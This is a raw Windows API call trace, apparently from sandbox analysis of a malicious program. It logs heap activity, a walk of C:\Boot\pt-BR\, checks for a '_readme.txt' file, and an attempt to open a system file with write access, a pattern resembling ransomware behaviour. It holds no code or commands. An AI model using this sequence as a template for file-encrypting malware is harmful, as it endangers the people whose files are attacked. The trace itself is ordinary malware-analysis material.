| out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.055] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.056] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.056] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.056] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.056] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.056] PathFindFileNameW (pszPath="") returned="" [0130.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.056] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.057] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.057] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.057] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.057] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.058] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.058] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0130.058] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0130.058] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.058] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0130.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.058] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.058] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.058] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.058] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.058] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.059] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0130.059] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.059] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned=".txt" [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0130.059] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.059] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.059] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.059] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.059] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.059] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.060] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.061] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.061] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.062] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.063] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.064] HeapFree 